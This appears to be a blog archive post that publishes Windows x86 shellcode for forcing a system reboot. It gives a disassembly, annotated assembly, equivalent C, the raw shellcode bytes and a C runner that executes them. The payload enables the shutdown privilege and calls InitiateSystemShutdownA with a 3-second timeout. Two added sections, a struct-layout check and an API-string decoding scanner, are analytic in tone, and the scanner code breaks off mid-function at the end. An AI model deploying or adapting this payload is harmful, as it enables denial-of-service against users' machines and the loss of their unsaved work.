Category Archives: (P) Windows

Windows x86 InitiateSystemShutdownA() Shellcode

/*
    # Title: Windows x86 InitiateSystemShutdownA() shellcode
    # Date : 18-08-2016
    # Tested on : Windows 7 x86 starter
*/
 
 
/*
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 48 10                mov    0x10(%eax),%ecx
  12:   8b 59 3c                mov    0x3c(%ecx),%ebx
  15:   01 cb                   add    %ecx,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 cb                   add    %ecx,%ebx
  1c:   8b 73 20                mov    0x20(%ebx),%esi
  1f:   01 ce                   add    %ecx,%esi
  21:   31 d2                   xor    %edx,%edx
 
00000023 <g>:
  23:   42                      inc    %edx
  24:   ad                      lods   %ds:(%esi),%eax
  25:   01 c8                   add    %ecx,%eax
  27:   81 38 47 65 74 50       cmpl   $0x50746547,(%eax)
  2d:   75 f4                   jne    23 <g>
  2f:   81 78 04 72 6f 63 41    cmpl   $0x41636f72,0x4(%eax)
  36:   75 eb                   jne    23 <g>
  38:   81 78 08 64 64 72 65    cmpl   $0x65726464,0x8(%eax)
  3f:   75 e2                   jne    23 <g>
  41:   8b 73 1c                mov    0x1c(%ebx),%esi
  44:   01 ce                   add    %ecx,%esi
  46:   8b 14 96                mov    (%esi,%edx,4),%edx
  49:   01 ca                   add    %ecx,%edx
  4b:   89 cf                   mov    %ecx,%edi
  4d:   31 c0                   xor    %eax,%eax
  4f:   50                      push   %eax
  50:   83 ec 1c                sub    $0x1c,%esp
  53:   8d 34 24                lea    (%esp),%esi
  56:   89 16                   mov    %edx,(%esi)
  58:   50                      push   %eax
  59:   68 6f 6b 65 6e          push   $0x6e656b6f
  5e:   68 65 73 73 54          push   $0x54737365
  63:   68 50 72 6f 63          push   $0x636f7250
  68:   68 4f 70 65 6e          push   $0x6e65704f
  6d:   8d 04 24                lea    (%esp),%eax
  70:   50                      push   %eax
  71:   51                      push   %ecx
  72:   ff d2                   call   *%edx
  74:   89 46 04                mov    %eax,0x4(%esi)
  77:   83 c4 10                add    $0x10,%esp
  7a:   31 c9                   xor    %ecx,%ecx
  7c:   68 73 41 42 42          push   $0x42424173
  81:   88 4c 24 01             mov    %cl,0x1(%esp)
  85:   68 6f 63 65 73          push   $0x7365636f
  8a:   68 6e 74 50 72          push   $0x7250746e
  8f:   68 75 72 72 65          push   $0x65727275
  94:   68 47 65 74 43          push   $0x43746547
  99:   8d 0c 24                lea    (%esp),%ecx
  9c:   51                      push   %ecx
  9d:   57                      push   %edi
  9e:   8b 16                   mov    (%esi),%edx
  a0:   ff d2                   call   *%edx
  a2:   83 c4 14                add    $0x14,%esp
  a5:   89 46 08                mov    %eax,0x8(%esi)
  a8:   31 c9                   xor    %ecx,%ecx
  aa:   68 65 73 73 41          push   $0x41737365
  af:   88 4c 24 03             mov    %cl,0x3(%esp)
  b3:   68 50 72 6f 63          push   $0x636f7250
  b8:   68 45 78 69 74          push   $0x74697845
  bd:   8d 0c 24                lea    (%esp),%ecx
  c0:   51                      push   %ecx
  c1:   57                      push   %edi
  c2:   8b 16                   mov    (%esi),%edx
  c4:   ff d2                   call   *%edx
  c6:   83 c4 0c                add    $0xc,%esp
  c9:   89 46 0c                mov    %eax,0xc(%esi)
  cc:   31 c9                   xor    %ecx,%ecx
  ce:   51                      push   %ecx
  cf:   68 61 72 79 41          push   $0x41797261
  d4:   68 4c 69 62 72          push   $0x7262694c
  d9:   68 4c 6f 61 64          push   $0x64616f4c
  de:   8d 0c 24                lea    (%esp),%ecx
  e1:   51                      push   %ecx
  e2:   57                      push   %edi
  e3:   8b 16                   mov    (%esi),%edx
  e5:   ff d2                   call   *%edx
  e7:   83 c4 0c                add    $0xc,%esp
  ea:   68 2e 64 6c 6c          push   $0x6c6c642e
  ef:   68 70 69 33 32          push   $0x32336970
  f4:   68 61 64 76 61          push   $0x61766461
  f9:   8d 0c 24                lea    (%esp),%ecx
  fc:   51                      push   %ecx
  fd:   ff d0                   call   *%eax
  ff:   83 c4 0c                add    $0xc,%esp
 102:   89 c7                   mov    %eax,%edi
 104:   31 c9                   xor    %ecx,%ecx
 106:   68 41 42 42 42          push   $0x42424241
 10b:   88 4c 24 01             mov    %cl,0x1(%esp)
 10f:   68 61 6c 75 65          push   $0x65756c61
 114:   68 65 67 65 56          push   $0x56656765
 119:   68 69 76 69 6c          push   $0x6c697669
 11e:   68 75 70 50 72          push   $0x72507075
 123:   68 4c 6f 6f 6b          push   $0x6b6f6f4c
 128:   8d 0c 24                lea    (%esp),%ecx
 12b:   51                      push   %ecx
 12c:   50                      push   %eax
 12d:   8b 16                   mov    (%esi),%edx
 12f:   ff d2                   call   *%edx
 131:   83 c4 18                add    $0x18,%esp
 134:   89 46 10                mov    %eax,0x10(%esi)
 137:   31 c9                   xor    %ecx,%ecx
 139:   68 73 41 41 41          push   $0x41414173
 13e:   88 4c 24 01             mov    %cl,0x1(%esp)
 142:   68 6c 65 67 65          push   $0x6567656c
 147:   68 72 69 76 69          push   $0x69766972
 14c:   68 6b 65 6e 50          push   $0x506e656b
 151:   68 73 74 54 6f          push   $0x6f547473
 156:   68 41 64 6a 75          push   $0x756a6441
 15b:   8d 0c 24                lea    (%esp),%ecx
 15e:   51                      push   %ecx
 15f:   57                      push   %edi
 160:   8b 16                   mov    (%esi),%edx
 162:   ff d2                   call   *%edx
 164:   83 c4 18                add    $0x18,%esp
 167:   89 46 14                mov    %eax,0x14(%esi)
 16a:   31 c9                   xor    %ecx,%ecx
 16c:   68 77 6e 41 42          push   $0x42416e77
 171:   88 4c 24 03             mov    %cl,0x3(%esp)
 175:   68 75 74 64 6f          push   $0x6f647475
 17a:   68 65 6d 53 68          push   $0x68536d65
 17f:   68 53 79 73 74          push   $0x74737953
 184:   68 69 61 74 65          push   $0x65746169
 189:   68 49 6e 69 74          push   $0x74696e49
 18e:   8d 0c 24                lea    (%esp),%ecx
 191:   51                      push   %ecx
 192:   57                      push   %edi
 193:   8b 16                   mov    (%esi),%edx
 195:   ff d2                   call   *%edx
 197:   83 c4 18                add    $0x18,%esp
 19a:   89 46 18                mov    %eax,0x18(%esi)
 19d:   31 c0                   xor    %eax,%eax
 19f:   50                      push   %eax
 1a0:   83 ec 14                sub    $0x14,%esp
 1a3:   8d 3c 24                lea    (%esp),%edi
 
000001a6 <proc_start>:
 1a6:   8b 46 08                mov    0x8(%esi),%eax
 1a9:   ff d0                   call   *%eax
 1ab:   31 d2                   xor    %edx,%edx
 1ad:   8d 17                   lea    (%edi),%edx
 1af:   52                      push   %edx
 1b0:   31 c9                   xor    %ecx,%ecx
 1b2:   b1 28                   mov    $0x28,%cl
 1b4:   51                      push   %ecx
 1b5:   50                      push   %eax
 1b6:   8b 4e 04                mov    0x4(%esi),%ecx
 1b9:   ff d1                   call   *%ecx
 1bb:   8d 57 04                lea    0x4(%edi),%edx
 1be:   8d 52 04                lea    0x4(%edx),%edx
 1c1:   8d 12                   lea    (%edx),%edx
 1c3:   31 c9                   xor    %ecx,%ecx
 1c5:   68 65 67 65 41          push   $0x41656765
 1ca:   88 4c 24 03             mov    %cl,0x3(%esp)
 1ce:   68 69 76 69 6c          push   $0x6c697669
 1d3:   68 77 6e 50 72          push   $0x72506e77
 1d8:   68 75 74 64 6f          push   $0x6f647475
 1dd:   68 53 65 53 68          push   $0x68536553
 1e2:   8d 0c 24                lea    (%esp),%ecx
 1e5:   31 db                   xor    %ebx,%ebx
 1e7:   52                      push   %edx
 1e8:   51                      push   %ecx
 1e9:   53                      push   %ebx
 1ea:   8b 5e 10                mov    0x10(%esi),%ebx
 1ed:   ff d3                   call   *%ebx
 1ef:   8d 57 04                lea    0x4(%edi),%edx
 1f2:   31 c9                   xor    %ecx,%ecx
 1f4:   41                      inc    %ecx
 1f5:   89 0a                   mov    %ecx,(%edx)
 1f7:   8d 52 04                lea    0x4(%edx),%edx
 1fa:   41                      inc    %ecx
 1fb:   89 4a 08                mov    %ecx,0x8(%edx)
 1fe:   31 d2                   xor    %edx,%edx
 200:   52                      push   %edx
 201:   52                      push   %edx
 202:   52                      push   %edx
 203:   8d 57 04                lea    0x4(%edi),%edx
 206:   52                      push   %edx
 207:   31 d2                   xor    %edx,%edx
 209:   52                      push   %edx
 20a:   8b 17                   mov    (%edi),%edx
 20c:   52                      push   %edx
 20d:   8b 56 14                mov    0x14(%esi),%edx
 210:   ff d2                   call   *%edx
 212:   31 c9                   xor    %ecx,%ecx
 214:   51                      push   %ecx
 215:   68 6e 64 73 21          push   $0x2173646e
 21a:   68 73 65 63 6f          push   $0x6f636573
 21f:   68 41 20 33 20          push   $0x20332041
 224:   68 6d 2e 45 54          push   $0x54452e6d
 229:   68 79 73 74 65          push   $0x65747379
 22e:   68 6e 67 20 53          push   $0x5320676e
 233:   68 61 72 74 49          push   $0x49747261
 238:   68 52 65 73 74          push   $0x74736552
 23d:   8d 1c 24                lea    (%esp),%ebx
 240:   41                      inc    %ecx
 241:   51                      push   %ecx
 242:   31 c9                   xor    %ecx,%ecx
 244:   51                      push   %ecx
 245:   b1 03                   mov    $0x3,%cl
 247:   51                      push   %ecx
 248:   53                      push   %ebx
 249:   31 c9                   xor    %ecx,%ecx
 24b:   51                      push   %ecx
 24c:   8b 4e 18                mov    0x18(%esi),%ecx
 24f:   ff d1                   call   *%ecx
 251:   8b 4e 0c                mov    0xc(%esi),%ecx
 254:   50                      push   %eax
 255:   ff d1                   call   *%ecx
 
 
*/
 
 
 
/*
HANDLE 4 bytes
TOKEN_PRIVILEGES 16 bytes
 
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = 40 
LUID_AND_ATTRIBUTES 12 bytes
LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"
SE_PRIVILEGE_ENABLED = 2
 
 
required functions (the DLL each one is resolved from follows the prototype):

1.  WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);   -> kernel32.dll
2.  WINBASEAPI HANDLE WINAPI GetCurrentProcess (VOID);   -> kernel32.dll

3.  WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);   -> advapi32.dll
4.  WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);   -> advapi32.dll
5.  WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);   -> advapi32.dll

6.  GetProcAddress()   -> kernel32.dll
7.  ExitProcess()   -> kernel32.dll
8.  LoadLibraryA() [1 time use]   -> kernel32.dll
 
 
required macro and custom data types:

#define ANYSIZE_ARRAY 1

typedef struct _TOKEN_PRIVILEGES {
    DWORD PrivilegeCount;
    LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES,*PTOKEN_PRIVILEGES;

typedef struct _LUID_AND_ATTRIBUTES {
    LUID Luid;
    DWORD Attributes;
} LUID_AND_ATTRIBUTES,*PLUID_AND_ATTRIBUTES;
typedef LUID_AND_ATTRIBUTES LUID_AND_ATTRIBUTES_ARRAY[ANYSIZE_ARRAY];
typedef LUID_AND_ATTRIBUTES_ARRAY *PLUID_AND_ATTRIBUTES_ARRAY;

typedef struct _LUID {
    DWORD LowPart;
    LONG HighPart;
} LUID,*PLUID;

 
c code:
 
 
#include <windows.h>
#include <stdio.h>

int main(void){
    HANDLE h;
    TOKEN_PRIVILEGES t;

    /* open the current process token with the access AdjustTokenPrivileges needs */
    if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
        return 0;

    /* look up the LUID of SeShutdownPrivilege and enable it in the token */
    LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&t.Privileges[0].Luid);
    t.PrivilegeCount=1;
    t.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);

    /* 10 second timeout; last argument 1 = reboot after shutdown */
    InitiateSystemShutdown(NULL,"shutting",10,FALSE,1);
    return 0;
}
*/
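The sizes and offsets in the note above (LUID 8, LUID_AND_ATTRIBUTES 12, TOKEN_PRIVILEGES 16, access mask 40) are what the hand-written stack layout in the assembly relies on, so it is worth confirming them from the compiler rather than by counting. The following is an added check, not code from the original post: it types out the same structures with fixed-width stand-ins so it builds without windows.h (assumed: DWORD is 32-bit unsigned, LONG 32-bit signed, HANDLE 4 bytes as on x86), uses the documented SDK values for TOKEN_ADJUST_PRIVILEGES, TOKEN_QUERY and SE_PRIVILEGE_ENABLED, and models the scratch block the shellcode carves on the stack (HANDLE at +0, TOKEN_PRIVILEGES at +4, 20 bytes in total) to verify that the two stores made by hand, PrivilegeCount at +4 and Attributes at +16, land where the struct puts them.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Fixed-width stand-ins for the Windows types so this compiles without windows.h
 * (assumption: DWORD = 32-bit unsigned, LONG = 32-bit signed, HANDLE = 4 bytes on x86). */
typedef uint32_t DWORD;
typedef int32_t  LONG;
#define ANYSIZE_ARRAY 1

typedef struct _LUID {
    DWORD LowPart;
    LONG  HighPart;
} LUID;

typedef struct _LUID_AND_ATTRIBUTES {
    LUID  Luid;
    DWORD Attributes;
} LUID_AND_ATTRIBUTES;

typedef struct _TOKEN_PRIVILEGES {
    DWORD PrivilegeCount;
    LUID_AND_ATTRIBUTES Privileges[ANYSIZE_ARRAY];
} TOKEN_PRIVILEGES;

/* Documented SDK values for the constants the note above lists. */
#define TOKEN_ADJUST_PRIVILEGES 0x0020u
#define TOKEN_QUERY             0x0008u
#define SE_PRIVILEGE_ENABLED    0x00000002u

/* Scratch block the shellcode reserves on the stack: HANDLE at +0, TOKEN_PRIVILEGES at +4. */
enum { SCRATCH_HANDLE_OFF = 0, SCRATCH_TP_OFF = 4, SCRATCH_SIZE = 20 };

unsigned desired_access(void)         { return TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY; }
size_t luid_size(void)                { return sizeof(LUID); }
size_t luid_and_attributes_size(void) { return sizeof(LUID_AND_ATTRIBUTES); }
size_t token_privileges_size(void)    { return sizeof(TOKEN_PRIVILEGES); }

/* Offsets inside the scratch block, derived from the struct instead of counted by hand. */
size_t scratch_luid_off(void)       { return SCRATCH_TP_OFF + offsetof(TOKEN_PRIVILEGES, Privileges[0].Luid); }
size_t scratch_attributes_off(void) { return SCRATCH_TP_OFF + offsetof(TOKEN_PRIVILEGES, Privileges[0].Attributes); }

/* Fill the scratch block through the struct and check that the shellcode's two hand-made
 * stores ([edi+4] = 1 and [edi+16] = 2) hit the same bytes. Little-endian x86 assumed. */
int scratch_layout_matches(void)
{
    unsigned char scratch[SCRATCH_SIZE];
    TOKEN_PRIVILEGES tp;

    memset(scratch, 0, sizeof scratch);
    memset(&tp, 0, sizeof tp);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    memcpy(scratch + SCRATCH_TP_OFF, &tp, sizeof tp);

    return scratch[4] == 1 && scratch[16] == SE_PRIVILEGE_ENABLED
        && scratch_luid_off() == 8 && scratch_attributes_off() == 16
        && SCRATCH_TP_OFF + sizeof tp == SCRATCH_SIZE;
}

int main(void)
{
    printf("LUID %zu, LUID_AND_ATTRIBUTES %zu, TOKEN_PRIVILEGES %zu bytes\n",
           luid_size(), luid_and_attributes_size(), token_privileges_size());
    printf("TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY = %u\n", desired_access());
    printf("Luid at scratch+%zu, Attributes at scratch+%zu, hand layout %s\n",
           scratch_luid_off(), scratch_attributes_off(),
           scratch_layout_matches() ? "matches" : "differs");
    return 0;
}
```

The Luid offset (+8) is the address the listing passes to LookupPrivilegeValueA via `lea edx,[edi+4]` followed by `lea edx,[edx+4]`, and the Attributes offset (+16) is the `[edx+8]` store after the second `lea`; if a port to another ABI changed HANDLE or struct padding, this check is what would catch it.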
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
 
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->Ldr.InMemoryOrderModuleList
lodsd
xchg esi,eax
lodsd
mov ecx,[eax+0x10] ;kernel32.dll base address
 
 
mov ebx,[ecx+0x3c] ;DOS header->e_lfanew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory[0].VirtualAddress (export table RVA)
add ebx,ecx ;IMAGE_EXPORT_DIRECTORY
 
 
mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx
 
xor edx,edx
 
g:
inc edx
lodsd
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g
 
 
mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx
 
mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()
 
mov edi,ecx ;kernel32.dll
 
xor eax,eax
push eax
sub esp,28
 
lea esi,[esp]
 
mov [esi],dword edx ;GetProcAddress() at offset 0
 
 
;---------------------------------
;finding address of OpenProcessToken()
 
push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f
 
lea eax,[esp]
push eax
push ecx
 
call edx
;-----------------------------------
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10
;-------------------------
 
;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8
;----------------------------------
 
;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845
 
lea ecx,[esp]
 
push ecx
push edi
mov edx,dword [esi]
call edx
;-----------------------
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12
;-------------------------------------------
 
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;--------------------
add esp,12
 
;LoadLibraryA("advapi32.dll")
push 0x6c6c642e
push 0x32336970
push 0x61766461
 
lea ecx,[esp]
push ecx
call eax
;--------------------------
add esp,12
mov edi,eax ; advapi32.dll
;------------------------------
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c
 
 
lea ecx,[esp]
push ecx
push eax
 
mov edx,dword [esi]
call edx
 
;---------------------------
add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16
;-------------------------
 
;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;------------------------------------
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20
;---------------------------
 
;finding address of InitiateSystemShutdownA()
 
xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49
 
 
lea ecx,[esp]
push ecx
push edi
 
mov edx,dword [esi]
call edx
;-------------------------
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24
;-------------------------
 
xor eax,eax
push eax
 
 
sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address
 
 
;---------------------------------
;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24
 
;----------------------------------------
 
 
 
proc_start:
 
;---------------------------
;GetCurrentProcess()
 
mov eax,[esi+8]
call eax
 
;----------------------------
;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&HANDLE)
 
xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40
 
push ecx
push eax
 
mov ecx,[esi+4]
call ecx
 
;--------------------------
;LookupPrivilegeValueA(NULL,SE_SHUTDOWN_NAME,&TOKEN_PRIVILEGES.Privileges[0].Luid);
 
lea edx,[edi+4]
lea edx,[edx+4]
 
 
lea edx,[edx]
 
xor ecx,ecx
 
push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553
 
lea ecx,[esp]
 
 
xor ebx,ebx
 
 
push edx
push ecx
push ebx
 
mov ebx,[esi+16]
call ebx
;----------------------------------
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx
 
xor edx,edx
push edx
push edx
push edx
 
lea edx,[edi+4]
push edx
 
xor edx,edx
push edx
 
mov edx,dword [edi]
 
push edx
 
mov edx,[esi+20]
call edx
 
;----------------------------
;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);
 
xor ecx,ecx
 
 
;--------------------------
push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552
 
 
lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"
;------------------------------
 
inc ecx ;bRebootAfterShutdown = 1; remove this line to shut the system down instead of rebooting
 
push ecx
 
xor ecx,ecx
push ecx
 
mov cl,3 ;3 seconds
push ecx
push ebx 
xor ecx,ecx
push ecx
 
 
mov ecx,[esi+24]
call ecx
 
;--------------------------
;Exiting
mov ecx,[esi+12]
push eax
call ecx
*/
 
 
#include <stdio.h>
#include <string.h>

/* raw bytes of the listing above; strlen() works because the shellcode contains no NUL byte */
char shellcode[] =
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xcf\x31\xc0\x50\x83\xec\x1c\x8d\x34\x24\x89\x16\x50\x68\x6f\x6b\x65\x6e\x68\x65\x73\x73\x54\x68\x50\x72\x6f\x63\x68\x4f\x70\x65\x6e\x8d\x04\x24\x50\x51\xff\xd2\x89\x46\x04\x83\xc4\x10\x31\xc9\x68\x73\x41\x42\x42\x88\x4c\x24\x01\x68\x6f\x63\x65\x73\x68\x6e\x74\x50\x72\x68\x75\x72\x72\x65\x68\x47\x65\x74\x43\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x14\x89\x46\x08\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x0c\x68\x2e\x64\x6c\x6c\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x0c\x89\xc7\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x61\x6c\x75\x65\x68\x65\x67\x65\x56\x68\x69\x76\x69\x6c\x68\x75\x70\x50\x72\x68\x4c\x6f\x6f\x6b\x8d\x0c\x24\x51\x50\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x10\x31\xc9\x68\x73\x41\x41\x41\x88\x4c\x24\x01\x68\x6c\x65\x67\x65\x68\x72\x69\x76\x69\x68\x6b\x65\x6e\x50\x68\x73\x74\x54\x6f\x68\x41\x64\x6a\x75\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x14\x31\xc9\x68\x77\x6e\x41\x42\x88\x4c\x24\x03\x68\x75\x74\x64\x6f\x68\x65\x6d\x53\x68\x68\x53\x79\x73\x74\x68\x69\x61\x74\x65\x68\x49\x6e\x69\x74\x8d\x0c\x24\x51\x57\x8b\x16\xff\xd2\x83\xc4\x18\x89\x46\x18\x31\xc0\x50\x83\xec\x14\x8d\x3c\x24\x8b\x46\x08\xff\xd0\x31\xd2\x8d\x17\x52\x31\xc9\xb1\x28\x51\x50\x8b\x4e\x04\xff\xd1\x8d\x57\x04\x8d\x52\x04\x8d\x12\x31\xc9\x68\x65\x67\x65\x41\x88\x4c\x24\x03\x68\x69\x76\x69\x6c\x68\x77\x6e\x50\x72\x68\x75\x74\x64\x6f\x68\x53\x65\x53\x68\x8d\x0c\x24\x31\xdb\x52\x51\x53\x8b\x5e\x10\xff\xd3\x8d\x57\x04\x31\xc9\x41\x89\x0a\x8d\x52\x04\x41\x89\x4a\x08\x31\xd2\x52\x52\x52\x8d\x57\x04\x52\x31\xd2\x52\x8b\x17\x52\x8b\x56\x14\xff\xd2\x31\xc9\x51\x68\x6e\x64\x73\x21\x68\x73\x65\x63\x6f\x68\x41\x20\x33\x20\x68\x6d\x2e\x45\x54\x68\x79\x73\x74\x65\x68\x6e\x67\x20\x53\x68\x61\x72\x74\x49\x68\x52\x65\x73\x74\x8d\x1c\x24\x41\x51\x31\xc9\x51\xb1\x03\x51\x53\x31\xc9\x51\x8b\x4e\x18\xff\xd1\x8b\x4e\x0c\x50\xff\xd1";

int main(void)
{
    printf("shellcode length %ld\n", (long)strlen(shellcode));
    (*(int (*)(void)) shellcode)();
    return 0;
}
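Every API name in the listing above is built on the stack from a run of `push imm32` instructions, with a `mov [esp+n],cl` (cl already zeroed by `xor ecx,ecx`) dropping the terminator into a padding word when the name length is not a multiple of four. When triaging a sample like this, the first thing an analyst wants is those names back as text. The following is an added example, not code from the original post: a small scanner that walks raw x86 bytes, collects each run of pushes, re-creates the stack bytes in push order and applies the terminator patch. The sample bytes are the OpenProcessToken and GetCurrentProcess fragments copied from the disassembly above (the instructions in between left in place); the assumption that cl is zero when the patch executes comes from the listing itself.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define MAX_PUSHES 32
#define STR_MAX    64

/* Re-create the bytes a run of `push imm32` leaves on the stack and copy out the string.
 * imm[] is in execution order, so imm[0] ends up highest and the string reads from the
 * last push upward. patch_push/patch_disp emulate `mov [esp+disp], cl` issued right after
 * push number patch_push (assumes cl == 0, as the listing's `xor ecx,ecx` guarantees). */
static void lay_out_run(const uint32_t *imm, size_t k, int patch_push, int patch_disp, char *out)
{
    unsigned char stack[MAX_PUSHES * 4];
    size_t j, n, total = k * 4;

    for (j = 0; j < k; j++) {
        size_t off = (k - 1 - j) * 4;            /* later pushes land at lower addresses */
        stack[off]     = (unsigned char)(imm[j]);
        stack[off + 1] = (unsigned char)(imm[j] >> 8);
        stack[off + 2] = (unsigned char)(imm[j] >> 16);
        stack[off + 3] = (unsigned char)(imm[j] >> 24);
    }
    if (patch_push >= 0) {
        size_t off = (k - 1 - (size_t)patch_push) * 4 + (size_t)patch_disp;
        if (off < total)
            stack[off] = 0;                      /* the NUL terminator written via cl */
    }
    for (n = 0; n < total && stack[n] != 0 && n < STR_MAX - 1; n++)
        out[n] = (char)stack[n];
    out[n] = 0;
}

/* Linear scan of raw code bytes for runs of `68 imm32`. A run ends at the first byte that
 * is neither a push nor the `88 4c 24 disp8` terminator patch. Runs of two or more pushes
 * are decoded into out[]; the number found is returned. This is a triage heuristic, not a
 * disassembler: an 0x68 byte inside some other instruction would start a bogus run. */
size_t decode_push_strings(const uint8_t *code, size_t len, char out[][STR_MAX], size_t max_out)
{
    uint32_t imm[MAX_PUSHES];
    size_t k = 0, found = 0, i = 0;
    int patch_push = -1, patch_disp = 0;

    while (i < len) {
        if (code[i] == 0x68 && i + 5 <= len) {
            if (k == MAX_PUSHES) {               /* imm[] full: flush and start a fresh run */
                if (found < max_out)
                    lay_out_run(imm, k, patch_push, patch_disp, out[found++]);
                k = 0; patch_push = -1; patch_disp = 0;
            }
            imm[k++] = (uint32_t)code[i + 1] | ((uint32_t)code[i + 2] << 8)
                     | ((uint32_t)code[i + 3] << 16) | ((uint32_t)code[i + 4] << 24);
            i += 5;
            continue;
        }
        if (k > 0 && patch_push < 0 && i + 4 <= len
            && code[i] == 0x88 && code[i + 1] == 0x4c && code[i + 2] == 0x24) {
            patch_push = (int)k - 1;             /* patch applies to the push just seen */
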